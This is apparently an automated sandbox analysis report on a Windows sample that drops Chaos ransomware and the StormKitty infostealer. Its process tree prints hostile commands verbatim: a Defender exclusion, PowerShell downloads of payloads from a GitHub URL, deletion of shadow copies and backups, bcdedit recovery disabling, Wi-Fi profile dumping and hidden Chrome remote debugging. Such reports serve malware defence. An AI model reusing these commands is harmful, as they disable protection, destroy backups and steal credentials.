Analysis
-
max time kernel
37s -
max time network
39s -
platform
windows11-21h2_x64 -
resource
win11-20250313-en -
resource tags
arch:x64 arch:x86 image:win11-20250313-en locale:en-us os:windows11-21h2-x64 system -
submitted
22/03/2025, 02:29
Behavioral task
behavioral1
Sample
nig.exe
Resource
win11-20250313-en
General
-
Target
nig.exe
-
Size
57KB
-
MD5
16edd47bf01716b24958a0b3a3a7bcfb
-
SHA1
8b7972f4190c2ca9d600084611e966fa0f899b98
-
SHA256
568d485f89554f0a315d1f839e5e2b33c7735f9b3dc3892391bdaa16a3f480e8
-
SHA512
9e6ca1cbfa194aff3aebb60fa7b73ee4ff63f9770cfe1d114b757d55693278ccb8f6a450235255a3ae03ac382b528b899eb973d571523fe12e3910b9568d38e1
-
SSDEEP
768:d5qkvPJg++TldUQJbxc1knPItshRGibgFfYTrTQc1mRdJcWvFM79yipBvSrrCeao:3rPJVKjbcknWSOYvTfkWkFM79yQVFu/
Malware Config
Signatures
-
Chaos
Ransomware family first seen in June 2021.
-
Chaos Ransomware 2 IoCs
resource yara_rule behavioral1/files/0x001900000002b01f-45.dat family_chaos behavioral1/memory/3268-47-0x0000000000760000-0x0000000000788000-memory.dmp family_chaos -
Chaos family
-
StormKitty
StormKitty is an open source info stealer written in C#.
-
StormKitty payload 2 IoCs
resource yara_rule behavioral1/files/0x001a00000002b020-49.dat family_stormkitty behavioral1/memory/1972-60-0x00000000004A0000-0x00000000004DC000-memory.dmp family_stormkitty -
Stormkitty family
-
Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
pid Process 6012 bcdedit.exe 5232 bcdedit.exe -
Blocklisted process makes network request 4 IoCs
flow pid Process 2 3940 powershell.exe 3 3940 powershell.exe 4 5208 powershell.exe 5 5208 powershell.exe -
pid Process 5660 wbadmin.exe -
Disables Task Manager via registry modification
-
Downloads MZ/PE file 2 IoCs
flow pid Process 3 3940 powershell.exe 5 5208 powershell.exe -
Uses browser remote debugging 2 TTPs 5 IoCs
Can be used to control the browser and steal sensitive information such as credentials and session cookies.
pid Process 2160 chrome.exe 2316 chrome.exe 6112 chrome.exe 4812 chrome.exe 2188 chrome.exe -
Drops startup file 3 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\readme.txt svchost.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.url svchost.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini svchost.exe -
Executes dropped EXE 3 IoCs
pid Process 3268 build.exe 1972 kernelv.exe 5020 svchost.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-1136229799-3442283115-138161576-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 kernelv.exe Key opened \REGISTRY\USER\S-1-5-21-1136229799-3442283115-138161576-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 kernelv.exe Key opened \REGISTRY\USER\S-1-5-21-1136229799-3442283115-138161576-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 kernelv.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
pid Process 3940 powershell.exe 5208 powershell.exe 4676 powershell.exe -
Drops desktop.ini file(s) 64 IoCs
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 1 ipinfo.io 6 ipinfo.io -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1136229799-3442283115-138161576-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\g98dlc69x.jpg" svchost.exe -
resource yara_rule behavioral1/memory/4732-0-0x0000000140000000-0x0000000140028000-memory.dmp upx behavioral1/memory/4732-41-0x0000000140000000-0x0000000140028000-memory.dmp upx behavioral1/memory/4732-65-0x0000000140000000-0x0000000140028000-memory.dmp upx -
Drops file in Windows directory 1 IoCs
description ioc Process File opened for modification C:\Windows\SystemTemp chrome.exe -
Hide Artifacts: Ignore Process Interrupts 1 TTPs 2 IoCs
Command interpreters often include specific commands/flags that ignore errors and other hangups.
pid Process 4676 powershell.exe 408 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe -
System Location Discovery: System Language Discovery 1 TTPs 8 IoCs
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language chcp.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language chcp.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language kernelv.exe -
System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs
Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.
pid Process 3992 cmd.exe 1128 netsh.exe -
Checks SCSI registry key(s) 3 TTPs 4 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 vds.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName vds.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 vds.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName vds.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0 kernelv.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier kernelv.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe -
Interacts with shadow copies 3 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 3184 vssadmin.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1136229799-3442283115-138161576-1000_Classes\Local Settings svchost.exe -
Opens file in notepad (likely ransom note) 1 IoCs
pid Process 288 NOTEPAD.EXE -
Runs net.exe
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 5020 svchost.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 4 IoCs
pid Process 2188 chrome.exe 2188 chrome.exe 2188 chrome.exe 2188 chrome.exe -
Suspicious use of AdjustPrivilegeToken 63 IoCs
-
Suspicious use of FindShellTrayWindow 2 IoCs
pid Process 2188 chrome.exe 2188 chrome.exe -
Suspicious use of WriteProcessMemory 64 IoCs
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
-
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-1136229799-3442283115-138161576-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 kernelv.exe -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-1136229799-3442283115-138161576-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 kernelv.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\nig.exe"C:\Users\Admin\AppData\Local\Temp\nig.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:4732 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\755F.tmp\7560.tmp\7561.bat C:\Users\Admin\AppData\Local\Temp\nig.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:2568 -
C:\Windows\system32\net.exenet session3⤵
- Suspicious use of WriteProcessMemory
PID:3120 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 session4⤵PID:4716
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -NoProfile -ExecutionPolicy Bypass -Command "Set-MpPreference -ExclusionPath \"$env:TEMP\" -ErrorAction SilentlyContinue"3⤵
- Command and Scripting Interpreter: PowerShell
- Hide Artifacts: Ignore Process Interrupts
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4676
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -NoProfile -ExecutionPolicy Bypass -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; iwr -Uri \"https://github.com/nfdsafnsdl/login/releases/download/V1/build.exe\" -OutFile \"C:\Users\Admin\AppData\Local\Temp\build.exe\" -ErrorAction Stop"3⤵
- Blocklisted process makes network request
- Downloads MZ/PE file
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3940
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -NoProfile -ExecutionPolicy Bypass -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; iwr -Uri \"https://github.com/nfdsafnsdl/login/releases/download/V1/kernelv.exe\" -OutFile \"C:\Users\Admin\AppData\Local\Temp\kernelv.exe\" -ErrorAction Stop"3⤵
- Blocklisted process makes network request
- Downloads MZ/PE file
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5208
-
-
C:\Users\Admin\AppData\Local\Temp\build.exe"C:\Users\Admin\AppData\Local\Temp\build.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3268 -
C:\Users\Admin\AppData\Roaming\svchost.exe"C:\Users\Admin\AppData\Roaming\svchost.exe"4⤵
- Drops startup file
- Executes dropped EXE
- Drops desktop.ini file(s)
- Sets desktop wallpaper using registry
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5020 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C vssadmin delete shadows /all /quiet & wmic shadowcopy delete5⤵PID:1476
-
C:\Windows\system32\vssadmin.exevssadmin delete shadows /all /quiet6⤵
- Interacts with shadow copies
PID:3184
-
-
C:\Windows\System32\Wbem\WMIC.exewmic shadowcopy delete6⤵
- Suspicious use of AdjustPrivilegeToken
PID:5872
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no5⤵PID:4768
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy ignoreallfailures6⤵
- Modifies boot configuration data using bcdedit
PID:6012
-
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled no6⤵
- Modifies boot configuration data using bcdedit
PID:5232
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C wbadmin delete catalog -quiet5⤵PID:2652
-
C:\Windows\system32\wbadmin.exewbadmin delete catalog -quiet6⤵
- Deletes backup catalog
PID:5660
-
-
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Roaming\readme.txt5⤵
- Opens file in notepad (likely ransom note)
PID:288
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\kernelv.exe"C:\Users\Admin\AppData\Local\Temp\kernelv.exe"3⤵
- Executes dropped EXE
- Accesses Microsoft Outlook profiles
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- outlook_office_path
- outlook_win_path
PID:1972 -
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All4⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Wi-Fi Discovery
- Suspicious use of WriteProcessMemory
PID:3992 -
C:\Windows\SysWOW64\chcp.comchcp 650015⤵
- System Location Discovery: System Language Discovery
PID:3600
-
-
C:\Windows\SysWOW64\netsh.exenetsh wlan show profile5⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Wi-Fi Discovery
PID:1128
-
-
C:\Windows\SysWOW64\findstr.exefindstr All5⤵
- System Location Discovery: System Language Discovery
PID:6016
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:6004 -
C:\Windows\SysWOW64\chcp.comchcp 650015⤵
- System Location Discovery: System Language Discovery
PID:4452
-
-
C:\Windows\SysWOW64\netsh.exenetsh wlan show networks mode=bssid5⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:5588
-
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default"4⤵
- Uses browser remote debugging
- Drops file in Windows directory
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:2188 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fff502adcf8,0x7fff502add04,0x7fff502add105⤵PID:1860
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=1964,i,772867317625329084,4164335906479403685,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=1956 /prefetch:25⤵PID:5284
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=1452,i,772867317625329084,4164335906479403685,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=2248 /prefetch:115⤵PID:3116
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2376,i,772867317625329084,4164335906479403685,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=2520 /prefetch:135⤵PID:6056
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9222 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3068,i,772867317625329084,4164335906479403685,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=3336 /prefetch:15⤵
- Uses browser remote debugging
PID:2316
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9222 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3300,i,772867317625329084,4164335906479403685,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=3392 /prefetch:15⤵
- Uses browser remote debugging
PID:2160
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9222 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4216,i,772867317625329084,4164335906479403685,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=4236 /prefetch:9
5⤵
- Uses browser remote debugging
PID:6112
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9222 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=3380,i,772867317625329084,4164335906479403685,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=4672 /prefetch:1
5⤵
- Uses browser remote debugging
PID:4812
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -NoProfile -ExecutionPolicy Bypass -Command "Remove-MpPreference -ExclusionPath \"$env:TEMP\" -ErrorAction SilentlyContinue"
3⤵
- Hide Artifacts: Ignore Process Interrupts
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:408
-
-
-
C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
1⤵
PID:1588
-
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:5048
-
C:\Windows\system32\wbengine.exe
"C:\Windows\system32\wbengine.exe"
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:6064
-
C:\Windows\System32\vdsldr.exe
C:\Windows\System32\vdsldr.exe -Embedding
1⤵
PID:6008
-
C:\Windows\System32\vds.exe
C:\Windows\System32\vds.exe
1⤵
- Checks SCSI registry key(s)
PID:6040
Network
MITRE ATT&CK Enterprise v15
Execution
- Command and Scripting Interpreter: 2
- PowerShell: 1
- Windows Management Instrumentation: 1
Persistence
- Event Triggered Execution: 1
- Netsh Helper DLL: 1
- Modify Authentication Process: 1
Defense Evasion
- Direct Volume Access: 1
- Hide Artifacts: 1
- Ignore Process Interrupts: 1
- Indicator Removal: 3
- File Deletion: 3
- Modify Authentication Process: 1
- Modify Registry: 1
Credential Access
- Credentials from Password Stores: 1
- Credentials from Web Browsers: 1
- Modify Authentication Process: 1
- Steal Web Session Cookie: 1
- Unsecured Credentials: 2
- Credentials In Files: 2
Downloads
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ghbmnnjooekpmoecnnnilnnbdlolhkhi\000003.log
Filesize 87B